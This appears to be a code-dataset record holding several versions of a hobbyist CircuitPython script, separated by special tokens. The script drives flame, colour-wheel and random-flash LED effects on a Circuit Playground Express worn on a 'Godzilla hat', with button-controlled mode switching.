rval = 0
elif pos > 31 and pos < 64:
rval = int(pos * 8 - 249)
elif pos > 63 and pos < 96:
rval = int(767 - pos * 8)
elif pos > 95 and pos < 128:
rval = 0
elif pos > 127 and pos < 160:
rval = int(pos * 8 - 1017)
elif pos > 159 and pos < 192:
rval = int(1535 - pos * 8)
elif pos > 191 and pos < 224:
rval = 0
elif pos > 223:
rval = 0
if clr == 0:
return rval, 0, 0
elif clr == 1:
return rval, rval, 0
elif clr == 2:
return 0, rval, 0
elif clr == 3:
return 0, rval, rval
elif clr == 4:
return 0, rval, rval
elif clr == 5:
return rval, 0, rval
else:
return 0, 0, 0
def alloff():
cpx.pixels.fill((0, 0, 0))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
cpx.pixels.fill((0, 0, 0))
def wheeln(pos, sft):
if pos + sft > 255:
pos = pos + sft - 256
else:
pos = pos + sft
if pos < 0 or pos > 255:
return 0, 0, 0
if pos < 85:
return int(255 - pos * 3), int(pos * 3), 0
elif pos < 170:
pos -= 85
return 0, int(255 - pos * 3), int(pos * 3)
else:
pos -= 170
return int(pos * 3), 0, int(255 - pos * 3)
def randcolor():
randgr = randrd = randbl = 0
if random.randint(0, 14) == 1:
if random.randint(0, 1) == 1:
randgr = random.randint(1, 255)
if random.randint(0, 1) == 1:
randrd = random.randint(1, 255)
if random.randint(0, 1) == 1:
randbl = random.randint(1, 255)
return randgr, randrd, randbl
def flame(pos, clr, sft):
if pos + sft > 255:
pos = pos + sft - 256
else:
pos = pos + sft
if pos < 32:
rval = 0
elif pos > 31 and pos < 64:
rval = int(pos * 8 - 249)
elif pos > 63 and pos < 96:
rval = int(767 - pos * 8)
elif pos > 95 and pos < 128:
rval = 0
elif pos > 127 and pos < 160:
rval = int(pos * 8 - 1017)
elif pos > 159 and pos < 192:
rval = int(1535 - pos * 8)
elif pos > 191 and pos < 224:
rval = 0
elif pos > 223:
rval = 0
if clr == 0:
return rval, 0, 0
elif clr == 1:
return rval, rval, 0
elif clr == 2:
return 0, rval, 0
elif clr == 3:
return 0, rval, rval
elif clr == 4:
return 0, rval, rval
elif clr == 5:
return rval, 0, rval
else:
return 0, 0, 0
def alloff():
cpx.pixels.fill((0, 0, 0))
<|reserved_special_token_0|>
while True:
if mode == 1:
cpx.pixels[0] = flame(i, clr, 32)
cpx.pixels[1] = flame(i, clr, 24)
cpx.pixels[2] = flame(i, clr, 16)
cpx.pixels[3] = flame(i, clr, 8)
cpx.pixels[4] = flame(i, clr, 0)
cpx.pixels[5] = flame(i, clr, 0)
cpx.pixels[6] = flame(i, clr, 8)
cpx.pixels[7] = flame(i, clr, 16)
cpx.pixels[8] = flame(i, clr, 24)
cpx.pixels[9] = flame(i, clr, 32)
elif mode == 2:
cpx.pixels[0] = wheeln(i, 0)
cpx.pixels[1] = wheeln(i, 24)
cpx.pixels[2] = wheeln(i, 48)
cpx.pixels[3] = wheeln(i, 72)
cpx.pixels[4] = wheeln(i, 96)
cpx.pixels[5] = wheeln(i, 120)
cpx.pixels[6] = wheeln(i, 144)
cpx.pixels[7] = wheeln(i, 168)
cpx.pixels[8] = wheeln(i, 192)
cpx.pixels[9] = wheeln(i, 216)
elif mode == 3:
cpx.pixels[0] = randcolor()
cpx.pixels[1] = randcolor()
cpx.pixels[2] = randcolor()
cpx.pixels[3] = randcolor()
cpx.pixels[4] = randcolor()
cpx.pixels[5] = randcolor()
cpx.pixels[6] = randcolor()
cpx.pixels[7] = randcolor()
cpx.pixels[8] = randcolor()
cpx.pixels[9] = randcolor()
else:
alloff()
if cpx.button_a:
print('Button A on Bottom Pressed! Changing mode to ALL OFF.')
pusha = 1
if cpx.button_b:
print('Button B on Top Pressed! Changing mode.')
pushb = 1
i = (i + 1) % 256
if i == 255:
clr = (clr + 1) % 6
if (i == 63) | (i == 127) | (i == 191) | (i >= 255) and pusha == 1:
mode = 0
pusha = 0
i = 0
if (i == 63) | (i == 127) | (i == 191) | (i >= 255) and pushb == 1:
mode = mode + 1
pushb = 0
i = 0
if mode > 3:
mode = 1
<|reserved_special_token_1|>
<|reserved_special_token_0|>
cpx.pixels.fill((0, 0, 0))
def wheeln(pos, sft):
if pos + sft > 255:
pos = pos + sft - 256
else:
pos = pos + sft
if pos < 0 or pos > 255:
return 0, 0, 0
if pos < 85:
return int(255 - pos * 3), int(pos * 3), 0
elif pos < 170:
pos -= 85
return 0, int(255 - pos * 3), int(pos * 3)
else:
pos -= 170
return int(pos * 3), 0, int(255 - pos * 3)
def randcolor():
randgr = randrd = randbl = 0
if random.randint(0, 14) == 1:
if random.randint(0, 1) == 1:
randgr = random.randint(1, 255)
if random.randint(0, 1) == 1:
randrd = random.randint(1, 255)
if random.randint(0, 1) == 1:
randbl = random.randint(1, 255)
return randgr, randrd, randbl
def flame(pos, clr, sft):
if pos + sft > 255:
pos = pos + sft - 256
else:
pos = pos + sft
if pos < 32:
rval = 0
elif pos > 31 and pos < 64:
rval = int(pos * 8 - 249)
elif pos > 63 and pos < 96:
rval = int(767 - pos * 8)
elif pos > 95 and pos < 128:
rval = 0
elif pos > 127 and pos < 160:
rval = int(pos * 8 - 1017)
elif pos > 159 and pos < 192:
rval = int(1535 - pos * 8)
elif pos > 191 and pos < 224:
rval = 0
elif pos > 223:
rval = 0
if clr == 0:
return rval, 0, 0
elif clr == 1:
return rval, rval, 0
elif clr == 2:
return 0, rval, 0
elif clr == 3:
return 0, rval, rval
elif clr == 4:
return 0, rval, rval
elif clr == 5:
return rval, 0, rval
else:
return 0, 0, 0
def alloff():
cpx.pixels.fill((0, 0, 0))
mode = 1
pusha = 0
pushb = 0
clr = 0
i = 0
while True:
if mode == 1:
cpx.pixels[0] = flame(i, clr, 32)
cpx.pixels[1] = flame(i, clr, 24)
cpx.pixels[2] = flame(i, clr, 16)
cpx.pixels[3] = flame(i, clr, 8)
cpx.pixels[4] = flame(i, clr, 0)
cpx.pixels[5] = flame(i, clr, 0)
cpx.pixels[6] = flame(i, clr, 8)
cpx.pixels[7] = flame(i, clr, 16)
cpx.pixels[8] = flame(i, clr, 24)
cpx.pixels[9] = flame(i, clr, 32)
elif mode == 2:
cpx.pixels[0] = wheeln(i, 0)
cpx.pixels[1] = wheeln(i, 24)
cpx.pixels[2] = wheeln(i, 48)
cpx.pixels[3] = wheeln(i, 72)
cpx.pixels[4] = wheeln(i, 96)
cpx.pixels[5] = wheeln(i, 120)
cpx.pixels[6] = wheeln(i, 144)
cpx.pixels[7] = wheeln(i, 168)
cpx.pixels[8] = wheeln(i, 192)
cpx.pixels[9] = wheeln(i, 216)
elif mode == 3:
cpx.pixels[0] = randcolor()
cpx.pixels[1] = randcolor()
cpx.pixels[2] = randcolor()
cpx.pixels[3] = randcolor()
cpx.pixels[4] = randcolor()
cpx.pixels[5] = randcolor()
cpx.pixels[6] = randcolor()
cpx.pixels[7] = randcolor()
cpx.pixels[8] = randcolor()
cpx.pixels[9] = randcolor()
else:
alloff()
if cpx.button_a:
print('Button A on Bottom Pressed! Changing mode to ALL OFF.')
pusha = 1
if cpx.button_b:
print('Button B on Top Pressed! Changing mode.')
pushb = 1
i = (i + 1) % 256
if i == 255:
clr = (clr + 1) % 6
if (i == 63) | (i == 127) | (i == 191) | (i >= 255) and pusha == 1:
mode = 0
pusha = 0
i = 0
if (i == 63) | (i == 127) | (i == 191) | (i >= 255) and pushb == 1:
mode = mode + 1
pushb = 0
i = 0
if mode > 3:
mode = 1
<|reserved_special_token_1|>
from adafruit_circuitplayground.express import cpx
import random
cpx.pixels.fill((0, 0, 0))
def wheeln(pos, sft):
if pos + sft > 255:
pos = pos + sft - 256
else:
pos = pos + sft
if pos < 0 or pos > 255:
return 0, 0, 0
if pos < 85:
return int(255 - pos * 3), int(pos * 3), 0
elif pos < 170:
pos -= 85
return 0, int(255 - pos * 3), int(pos * 3)
else:
pos -= 170
return int(pos * 3), 0, int(255 - pos * 3)
def randcolor():
randgr = randrd = randbl = 0
if random.randint(0, 14) == 1:
if random.randint(0, 1) == 1:
randgr = random.randint(1, 255)
if random.randint(0, 1) == 1:
randrd = random.randint(1, 255)
if random.randint(0, 1) == 1:
randbl = random.randint(1, 255)
return randgr, randrd, randbl
def flame(pos, clr, sft):
if pos + sft > 255:
pos = pos + sft - 256
else:
pos = pos + sft
if pos < 32:
rval = 0
elif pos > 31 and pos < 64:
rval = int(pos * 8 - 249)
elif pos > 63 and pos < 96:
rval = int(767 - pos * 8)
elif pos > 95 and pos < 128:
rval = 0
elif pos > 127 and pos < 160:
rval = int(pos * 8 - 1017)
elif pos > 159 and pos < 192:
rval = int(1535 - pos * 8)
elif pos > 191 and pos < 224:
rval = 0
elif pos > 223:
rval = 0
if clr == 0:
return rval, 0, 0
elif clr == 1:
return rval, rval, 0
elif clr == 2:
return 0, rval, 0
elif clr == 3:
return 0, rval, rval
elif clr == 4:
return 0, rval, rval
elif clr == 5:
return rval, 0, rval
else:
return 0, 0, 0
def alloff():
cpx.pixels.fill((0, 0, 0))
mode = 1
pusha = 0
pushb = 0
clr = 0
i = 0
while True:
if mode == 1:
cpx.pixels[0] = flame(i, clr, 32)
cpx.pixels[1] = flame(i, clr, 24)
cpx.pixels[2] = flame(i, clr, 16)
cpx.pixels[3] = flame(i, clr, 8)
cpx.pixels[4] = flame(i, clr, 0)
cpx.pixels[5] = flame(i, clr, 0)
cpx.pixels[6] = flame(i, clr, 8)
cpx.pixels[7] = flame(i, clr, 16)
cpx.pixels[8] = flame(i, clr, 24)
cpx.pixels[9] = flame(i, clr, 32)
elif mode == 2:
cpx.pixels[0] = wheeln(i, 0)
cpx.pixels[1] = wheeln(i, 24)
cpx.pixels[2] = wheeln(i, 48)
cpx.pixels[3] = wheeln(i, 72)
cpx.pixels[4] = wheeln(i, 96)
cpx.pixels[5] = wheeln(i, 120)
cpx.pixels[6] = wheeln(i, 144)
cpx.pixels[7] = wheeln(i, 168)
cpx.pixels[8] = wheeln(i, 192)
cpx.pixels[9] = wheeln(i, 216)
elif mode == 3:
cpx.pixels[0] = randcolor()
cpx.pixels[1] = randcolor()
cpx.pixels[2] = randcolor()
cpx.pixels[3] = randcolor()
cpx.pixels[4] = randcolor()
cpx.pixels[5] = randcolor()
cpx.pixels[6] = randcolor()
cpx.pixels[7] = randcolor()
cpx.pixels[8] = randcolor()
cpx.pixels[9] = randcolor()
else:
alloff()
if cpx.button_a:
print('Button A on Bottom Pressed! Changing mode to ALL OFF.')
pusha = 1
if cpx.button_b:
print('Button B on Top Pressed! Changing mode.')
pushb = 1
i = (i + 1) % 256
if i == 255:
clr = (clr + 1) % 6
if (i == 63) | (i == 127) | (i == 191) | (i >= 255) and pusha == 1:
mode = 0
pusha = 0
i = 0
if (i == 63) | (i == 127) | (i == 191) | (i >= 255) and pushb == 1:
mode = mode + 1
pushb = 0
i = 0
if mode > 3:
mode = 1
<|reserved_special_token_1|>
# My Godzilla Hat Code - @alt_bier
from adafruit_circuitplayground.express import cpx
import random
#cpx.pixels.brightness = 0.5 # 50 pct
cpx.pixels.fill((0, 0, 0)) # Turn off the NeoPixels if they're on!
# Function to give us a nice color swirl on the built in NeoPixel (R,G,B)
def wheeln(pos, sft):
if (pos + sft) > 255:
pos = (pos + sft) - 256
else:
pos = (pos + sft)
if (pos < 0) or (pos > 255):
return (0, 0, 0)
if pos < 85:
return (int(255 - pos*3), int(pos*3), 0)
elif pos < 170:
pos -= 85
return (0, int(255 - (pos*3)), int(pos*3))
else:
pos -= 170
return (int(pos*3), 0, int(255 - pos*3))
# Function to flash random colors
def randcolor():
randgr = randrd = randbl = 0
# determine if all colors off
if (random.randint(0,14) == 1):
# if on then determine if each color is off and return an intensity value if on
if (random.randint(0,1) == 1):
randgr = random.randint(1,255)
if (random.randint(0,1) == 1):
randrd = random.randint(1,255)
if (random.randint(0,1) == 1):
randbl = random.randint(1,255)
return (randgr, randrd, randbl)
# Function to simulate a flame effect on built in NeoPixel (R,G,B)
def flame(pos, clr, sft):
# pos = position, sft = shift
if (pos + sft) > 255:
pos = (pos + sft) - 256
else:
pos = (pos + sft)
#
# RETURN VALUES
if pos < 32:
# OFF
rval = 0
elif (pos > 31) and (pos < 64):
# Low-High
rval = int((pos*8) - 249)
elif (pos > 63) and (pos < 96):
# High-Low
rval = int(767 - (pos*8))
elif (pos > 95) and (pos < 128):
# OFF
rval = 0
elif (pos > 127) and (pos < 160):
# Low-High
rval = int((pos*8) - 1017)
elif (pos > 159) and (pos < 192):
# High-Low
rval = int(1535 - (pos*8))
elif (pos > 191) and (pos < 224):
# OFF
rval = 0
elif (pos > 223):
# OFF
rval = 0
#
# RETURN COLOR
if (clr == 0):
# Red
return (rval, 0, 0)
elif (clr == 1):
# Red & Green
return (rval, rval, 0)
elif (clr == 2):
# Green
return (0, rval, 0)
elif (clr == 3):
# Green & Blue
return (0, rval, rval)
elif (clr == 4):
# Blue
return (0, rval, rval)
elif (clr == 5):
# Blue & Red
return (rval, 0, rval)
else:
return (0, 0, 0)
# Function to turn off all the built in NeoPixels
def alloff():
cpx.pixels.fill((0, 0, 0))
mode = 1
pusha = 0
pushb = 0
clr = 0
i = 0
while True:
# NeoPixels are cpx.pixels[0-9]
if (mode == 1):
cpx.pixels[0] = flame(i, clr, 32)
cpx.pixels[1] = flame(i, clr, 24)
cpx.pixels[2] = flame(i, clr, 16)
cpx.pixels[3] = flame(i, clr, 8)
cpx.pixels[4] = flame(i, clr, 0)
cpx.pixels[5] = flame(i, clr, 0)
cpx.pixels[6] = flame(i, clr, 8)
cpx.pixels[7] = flame(i, clr, 16)
cpx.pixels[8] = flame(i, clr, 24)
cpx.pixels[9] = flame(i, clr, 32)
elif (mode == 2):
cpx.pixels[0] = wheeln(i, 0)
cpx.pixels[1] = wheeln(i, 24)
cpx.pixels[2] = wheeln(i, 48)
cpx.pixels[3] = wheeln(i, 72)
cpx.pixels[4] = wheeln(i, 96)
cpx.pixels[5] = wheeln(i, 120)
cpx.pixels[6] = wheeln(i, 144)
cpx.pixels[7] = wheeln(i, 168)
cpx.pixels[8] = wheeln(i, 192)
cpx.pixels[9] = wheeln(i, 216)
elif (mode == 3):
cpx.pixels[0] = randcolor()
cpx.pixels[1] = randcolor()
cpx.pixels[2] = randcolor()
cpx.pixels[3] = randcolor()
cpx.pixels[4] = randcolor()
cpx.pixels[5] = randcolor()
cpx.pixels[6] = randcolor()
cpx.pixels[7] = randcolor()
cpx.pixels[8] = randcolor()
cpx.pixels[9] = randcolor()
else:
# Mode = 0 so turn All Off
alloff()
# Button A is bottom button on hat
if cpx.button_a:
print("Button A on Bottom Pressed! Changing mode to ALL OFF.")
pusha = 1
# Button B is top button on hat
if cpx.button_b:
print("Button B on Top Pressed! Changing mode.")
pushb = 1
i = (i+1) % 256
#print (i)
if (i == 255):
clr = (clr+1) % 6
if ((i == 63) | (i == 127) | (i == 191) | (i >= 255)) and (pusha == 1):
mode = 0
pusha = 0
i = 0
if ((i == 63) | (i == 127) | (i == 191) | (i >= 255)) and (pushb == 1):
mode = (mode+1)
pushb = 0
i = 0
if (mode > 3):
mode = 1
|
flexible
|
{
"blob_id": "1dd223854c10e69a397098511eab50b9ebd347c8",
"index": 6027,
"step-1": "<mask token>\n\n\ndef wheeln(pos, sft):\n if pos + sft > 255:\n pos = pos + sft - 256\n else:\n pos = pos + sft\n if pos < 0 or pos > 255:\n return 0, 0, 0\n if pos < 85:\n return int(255 - pos * 3), int(pos * 3), 0\n elif pos < 170:\n pos -= 85\n return 0, int(255 - pos * 3), int(pos * 3)\n else:\n pos -= 170\n return int(pos * 3), 0, int(255 - pos * 3)\n\n\ndef randcolor():\n randgr = randrd = randbl = 0\n if random.randint(0, 14) == 1:\n if random.randint(0, 1) == 1:\n randgr = random.randint(1, 255)\n if random.randint(0, 1) == 1:\n randrd = random.randint(1, 255)\n if random.randint(0, 1) == 1:\n randbl = random.randint(1, 255)\n return randgr, randrd, randbl\n\n\ndef flame(pos, clr, sft):\n if pos + sft > 255:\n pos = pos + sft - 256\n else:\n pos = pos + sft\n if pos < 32:\n rval = 0\n elif pos > 31 and pos < 64:\n rval = int(pos * 8 - 249)\n elif pos > 63 and pos < 96:\n rval = int(767 - pos * 8)\n elif pos > 95 and pos < 128:\n rval = 0\n elif pos > 127 and pos < 160:\n rval = int(pos * 8 - 1017)\n elif pos > 159 and pos < 192:\n rval = int(1535 - pos * 8)\n elif pos > 191 and pos < 224:\n rval = 0\n elif pos > 223:\n rval = 0\n if clr == 0:\n return rval, 0, 0\n elif clr == 1:\n return rval, rval, 0\n elif clr == 2:\n return 0, rval, 0\n elif clr == 3:\n return 0, rval, rval\n elif clr == 4:\n return 0, rval, rval\n elif clr == 5:\n return rval, 0, rval\n else:\n return 0, 0, 0\n\n\ndef alloff():\n cpx.pixels.fill((0, 0, 0))\n\n\n<mask token>\n",
"step-2": "<mask token>\ncpx.pixels.fill((0, 0, 0))\n\n\ndef wheeln(pos, sft):\n if pos + sft > 255:\n pos = pos + sft - 256\n else:\n pos = pos + sft\n if pos < 0 or pos > 255:\n return 0, 0, 0\n if pos < 85:\n return int(255 - pos * 3), int(pos * 3), 0\n elif pos < 170:\n pos -= 85\n return 0, int(255 - pos * 3), int(pos * 3)\n else:\n pos -= 170\n return int(pos * 3), 0, int(255 - pos * 3)\n\n\ndef randcolor():\n randgr = randrd = randbl = 0\n if random.randint(0, 14) == 1:\n if random.randint(0, 1) == 1:\n randgr = random.randint(1, 255)\n if random.randint(0, 1) == 1:\n randrd = random.randint(1, 255)\n if random.randint(0, 1) == 1:\n randbl = random.randint(1, 255)\n return randgr, randrd, randbl\n\n\ndef flame(pos, clr, sft):\n if pos + sft > 255:\n pos = pos + sft - 256\n else:\n pos = pos + sft\n if pos < 32:\n rval = 0\n elif pos > 31 and pos < 64:\n rval = int(pos * 8 - 249)\n elif pos > 63 and pos < 96:\n rval = int(767 - pos * 8)\n elif pos > 95 and pos < 128:\n rval = 0\n elif pos > 127 and pos < 160:\n rval = int(pos * 8 - 1017)\n elif pos > 159 and pos < 192:\n rval = int(1535 - pos * 8)\n elif pos > 191 and pos < 224:\n rval = 0\n elif pos > 223:\n rval = 0\n if clr == 0:\n return rval, 0, 0\n elif clr == 1:\n return rval, rval, 0\n elif clr == 2:\n return 0, rval, 0\n elif clr == 3:\n return 0, rval, rval\n elif clr == 4:\n return 0, rval, rval\n elif clr == 5:\n return rval, 0, rval\n else:\n return 0, 0, 0\n\n\ndef alloff():\n cpx.pixels.fill((0, 0, 0))\n\n\n<mask token>\nwhile True:\n if mode == 1:\n cpx.pixels[0] = flame(i, clr, 32)\n cpx.pixels[1] = flame(i, clr, 24)\n cpx.pixels[2] = flame(i, clr, 16)\n cpx.pixels[3] = flame(i, clr, 8)\n cpx.pixels[4] = flame(i, clr, 0)\n cpx.pixels[5] = flame(i, clr, 0)\n cpx.pixels[6] = flame(i, clr, 8)\n cpx.pixels[7] = flame(i, clr, 16)\n cpx.pixels[8] = flame(i, clr, 24)\n cpx.pixels[9] = flame(i, clr, 32)\n elif mode == 2:\n cpx.pixels[0] = wheeln(i, 0)\n cpx.pixels[1] = wheeln(i, 24)\n cpx.pixels[2] = wheeln(i, 48)\n cpx.pixels[3] = wheeln(i, 72)\n cpx.pixels[4] = wheeln(i, 96)\n cpx.pixels[5] = wheeln(i, 120)\n cpx.pixels[6] = wheeln(i, 144)\n cpx.pixels[7] = wheeln(i, 168)\n cpx.pixels[8] = wheeln(i, 192)\n cpx.pixels[9] = wheeln(i, 216)\n elif mode == 3:\n cpx.pixels[0] = randcolor()\n cpx.pixels[1] = randcolor()\n cpx.pixels[2] = randcolor()\n cpx.pixels[3] = randcolor()\n cpx.pixels[4] = randcolor()\n cpx.pixels[5] = randcolor()\n cpx.pixels[6] = randcolor()\n cpx.pixels[7] = randcolor()\n cpx.pixels[8] = randcolor()\n cpx.pixels[9] = randcolor()\n else:\n alloff()\n if cpx.button_a:\n print('Button A on Bottom Pressed! Changing mode to ALL OFF.')\n pusha = 1\n if cpx.button_b:\n print('Button B on Top Pressed! Changing mode.')\n pushb = 1\n i = (i + 1) % 256\n if i == 255:\n clr = (clr + 1) % 6\n if (i == 63) | (i == 127) | (i == 191) | (i >= 255) and pusha == 1:\n mode = 0\n pusha = 0\n i = 0\n if (i == 63) | (i == 127) | (i == 191) | (i >= 255) and pushb == 1:\n mode = mode + 1\n pushb = 0\n i = 0\n if mode > 3:\n mode = 1\n",
"step-3": "<mask token>\ncpx.pixels.fill((0, 0, 0))\n\n\ndef wheeln(pos, sft):\n if pos + sft > 255:\n pos = pos + sft - 256\n else:\n pos = pos + sft\n if pos < 0 or pos > 255:\n return 0, 0, 0\n if pos < 85:\n return int(255 - pos * 3), int(pos * 3), 0\n elif pos < 170:\n pos -= 85\n return 0, int(255 - pos * 3), int(pos * 3)\n else:\n pos -= 170\n return int(pos * 3), 0, int(255 - pos * 3)\n\n\ndef randcolor():\n randgr = randrd = randbl = 0\n if random.randint(0, 14) == 1:\n if random.randint(0, 1) == 1:\n randgr = random.randint(1, 255)\n if random.randint(0, 1) == 1:\n randrd = random.randint(1, 255)\n if random.randint(0, 1) == 1:\n randbl = random.randint(1, 255)\n return randgr, randrd, randbl\n\n\ndef flame(pos, clr, sft):\n if pos + sft > 255:\n pos = pos + sft - 256\n else:\n pos = pos + sft\n if pos < 32:\n rval = 0\n elif pos > 31 and pos < 64:\n rval = int(pos * 8 - 249)\n elif pos > 63 and pos < 96:\n rval = int(767 - pos * 8)\n elif pos > 95 and pos < 128:\n rval = 0\n elif pos > 127 and pos < 160:\n rval = int(pos * 8 - 1017)\n elif pos > 159 and pos < 192:\n rval = int(1535 - pos * 8)\n elif pos > 191 and pos < 224:\n rval = 0\n elif pos > 223:\n rval = 0\n if clr == 0:\n return rval, 0, 0\n elif clr == 1:\n return rval, rval, 0\n elif clr == 2:\n return 0, rval, 0\n elif clr == 3:\n return 0, rval, rval\n elif clr == 4:\n return 0, rval, rval\n elif clr == 5:\n return rval, 0, rval\n else:\n return 0, 0, 0\n\n\ndef alloff():\n cpx.pixels.fill((0, 0, 0))\n\n\nmode = 1\npusha = 0\npushb = 0\nclr = 0\ni = 0\nwhile True:\n if mode == 1:\n cpx.pixels[0] = flame(i, clr, 32)\n cpx.pixels[1] = flame(i, clr, 24)\n cpx.pixels[2] = flame(i, clr, 16)\n cpx.pixels[3] = flame(i, clr, 8)\n cpx.pixels[4] = flame(i, clr, 0)\n cpx.pixels[5] = flame(i, clr, 0)\n cpx.pixels[6] = flame(i, clr, 8)\n cpx.pixels[7] = flame(i, clr, 16)\n cpx.pixels[8] = flame(i, clr, 24)\n cpx.pixels[9] = flame(i, clr, 32)\n elif mode == 2:\n cpx.pixels[0] = wheeln(i, 0)\n cpx.pixels[1] = wheeln(i, 24)\n cpx.pixels[2] = wheeln(i, 48)\n cpx.pixels[3] = wheeln(i, 72)\n cpx.pixels[4] = wheeln(i, 96)\n cpx.pixels[5] = wheeln(i, 120)\n cpx.pixels[6] = wheeln(i, 144)\n cpx.pixels[7] = wheeln(i, 168)\n cpx.pixels[8] = wheeln(i, 192)\n cpx.pixels[9] = wheeln(i, 216)\n elif mode == 3:\n cpx.pixels[0] = randcolor()\n cpx.pixels[1] = randcolor()\n cpx.pixels[2] = randcolor()\n cpx.pixels[3] = randcolor()\n cpx.pixels[4] = randcolor()\n cpx.pixels[5] = randcolor()\n cpx.pixels[6] = randcolor()\n cpx.pixels[7] = randcolor()\n cpx.pixels[8] = randcolor()\n cpx.pixels[9] = randcolor()\n else:\n alloff()\n if cpx.button_a:\n print('Button A on Bottom Pressed! Changing mode to ALL OFF.')\n pusha = 1\n if cpx.button_b:\n print('Button B on Top Pressed! Changing mode.')\n pushb = 1\n i = (i + 1) % 256\n if i == 255:\n clr = (clr + 1) % 6\n if (i == 63) | (i == 127) | (i == 191) | (i >= 255) and pusha == 1:\n mode = 0\n pusha = 0\n i = 0\n if (i == 63) | (i == 127) | (i == 191) | (i >= 255) and pushb == 1:\n mode = mode + 1\n pushb = 0\n i = 0\n if mode > 3:\n mode = 1\n",
"step-4": "from adafruit_circuitplayground.express import cpx\nimport random\ncpx.pixels.fill((0, 0, 0))\n\n\ndef wheeln(pos, sft):\n if pos + sft > 255:\n pos = pos + sft - 256\n else:\n pos = pos + sft\n if pos < 0 or pos > 255:\n return 0, 0, 0\n if pos < 85:\n return int(255 - pos * 3), int(pos * 3), 0\n elif pos < 170:\n pos -= 85\n return 0, int(255 - pos * 3), int(pos * 3)\n else:\n pos -= 170\n return int(pos * 3), 0, int(255 - pos * 3)\n\n\ndef randcolor():\n randgr = randrd = randbl = 0\n if random.randint(0, 14) == 1:\n if random.randint(0, 1) == 1:\n randgr = random.randint(1, 255)\n if random.randint(0, 1) == 1:\n randrd = random.randint(1, 255)\n if random.randint(0, 1) == 1:\n randbl = random.randint(1, 255)\n return randgr, randrd, randbl\n\n\ndef flame(pos, clr, sft):\n if pos + sft > 255:\n pos = pos + sft - 256\n else:\n pos = pos + sft\n if pos < 32:\n rval = 0\n elif pos > 31 and pos < 64:\n rval = int(pos * 8 - 249)\n elif pos > 63 and pos < 96:\n rval = int(767 - pos * 8)\n elif pos > 95 and pos < 128:\n rval = 0\n elif pos > 127 and pos < 160:\n rval = int(pos * 8 - 1017)\n elif pos > 159 and pos < 192:\n rval = int(1535 - pos * 8)\n elif pos > 191 and pos < 224:\n rval = 0\n elif pos > 223:\n rval = 0\n if clr == 0:\n return rval, 0, 0\n elif clr == 1:\n return rval, rval, 0\n elif clr == 2:\n return 0, rval, 0\n elif clr == 3:\n return 0, rval, rval\n elif clr == 4:\n return 0, rval, rval\n elif clr == 5:\n return rval, 0, rval\n else:\n return 0, 0, 0\n\n\ndef alloff():\n cpx.pixels.fill((0, 0, 0))\n\n\nmode = 1\npusha = 0\npushb = 0\nclr = 0\ni = 0\nwhile True:\n if mode == 1:\n cpx.pixels[0] = flame(i, clr, 32)\n cpx.pixels[1] = flame(i, clr, 24)\n cpx.pixels[2] = flame(i, clr, 16)\n cpx.pixels[3] = flame(i, clr, 8)\n cpx.pixels[4] = flame(i, clr, 0)\n cpx.pixels[5] = flame(i, clr, 0)\n cpx.pixels[6] = flame(i, clr, 8)\n cpx.pixels[7] = flame(i, clr, 16)\n cpx.pixels[8] = flame(i, clr, 24)\n cpx.pixels[9] = flame(i, clr, 32)\n elif mode == 2:\n cpx.pixels[0] = wheeln(i, 0)\n cpx.pixels[1] = wheeln(i, 24)\n cpx.pixels[2] = wheeln(i, 48)\n cpx.pixels[3] = wheeln(i, 72)\n cpx.pixels[4] = wheeln(i, 96)\n cpx.pixels[5] = wheeln(i, 120)\n cpx.pixels[6] = wheeln(i, 144)\n cpx.pixels[7] = wheeln(i, 168)\n cpx.pixels[8] = wheeln(i, 192)\n cpx.pixels[9] = wheeln(i, 216)\n elif mode == 3:\n cpx.pixels[0] = randcolor()\n cpx.pixels[1] = randcolor()\n cpx.pixels[2] = randcolor()\n cpx.pixels[3] = randcolor()\n cpx.pixels[4] = randcolor()\n cpx.pixels[5] = randcolor()\n cpx.pixels[6] = randcolor()\n cpx.pixels[7] = randcolor()\n cpx.pixels[8] = randcolor()\n cpx.pixels[9] = randcolor()\n else:\n alloff()\n if cpx.button_a:\n print('Button A on Bottom Pressed! Changing mode to ALL OFF.')\n pusha = 1\n if cpx.button_b:\n print('Button B on Top Pressed! Changing mode.')\n pushb = 1\n i = (i + 1) % 256\n if i == 255:\n clr = (clr + 1) % 6\n if (i == 63) | (i == 127) | (i == 191) | (i >= 255) and pusha == 1:\n mode = 0\n pusha = 0\n i = 0\n if (i == 63) | (i == 127) | (i == 191) | (i >= 255) and pushb == 1:\n mode = mode + 1\n pushb = 0\n i = 0\n if mode > 3:\n mode = 1\n",
"step-5": "# My Godzilla Hat Code - @alt_bier\nfrom adafruit_circuitplayground.express import cpx\nimport random\n\n#cpx.pixels.brightness = 0.5 # 50 pct\ncpx.pixels.fill((0, 0, 0)) # Turn off the NeoPixels if they're on!\n\n# Function to give us a nice color swirl on the built in NeoPixel (R,G,B)\ndef wheeln(pos, sft):\n if (pos + sft) > 255:\n pos = (pos + sft) - 256\n else:\n pos = (pos + sft)\n if (pos < 0) or (pos > 255):\n return (0, 0, 0)\n if pos < 85:\n return (int(255 - pos*3), int(pos*3), 0)\n elif pos < 170:\n pos -= 85\n return (0, int(255 - (pos*3)), int(pos*3))\n else:\n pos -= 170\n return (int(pos*3), 0, int(255 - pos*3))\n\n# Function to flash random colors\ndef randcolor():\n randgr = randrd = randbl = 0\n # determine if all colors off\n if (random.randint(0,14) == 1):\n # if on then determine if each color is off and return an intensity value if on\n if (random.randint(0,1) == 1):\n randgr = random.randint(1,255)\n if (random.randint(0,1) == 1):\n randrd = random.randint(1,255)\n if (random.randint(0,1) == 1):\n randbl = random.randint(1,255)\n return (randgr, randrd, randbl)\n\n# Function to simulate a flame effect on built in NeoPixel (R,G,B)\ndef flame(pos, clr, sft):\n # pos = position, sft = shift\n if (pos + sft) > 255:\n pos = (pos + sft) - 256\n else:\n pos = (pos + sft)\n #\n # RETURN VALUES\n if pos < 32:\n # OFF\n rval = 0\n elif (pos > 31) and (pos < 64):\n # Low-High\n rval = int((pos*8) - 249)\n elif (pos > 63) and (pos < 96):\n # High-Low\n rval = int(767 - (pos*8))\n elif (pos > 95) and (pos < 128):\n # OFF\n rval = 0\n elif (pos > 127) and (pos < 160):\n # Low-High\n rval = int((pos*8) - 1017)\n elif (pos > 159) and (pos < 192):\n # High-Low\n rval = int(1535 - (pos*8))\n elif (pos > 191) and (pos < 224):\n # OFF\n rval = 0\n elif (pos > 223):\n # OFF\n rval = 0\n #\n # RETURN COLOR\n if (clr == 0):\n # Red\n return (rval, 0, 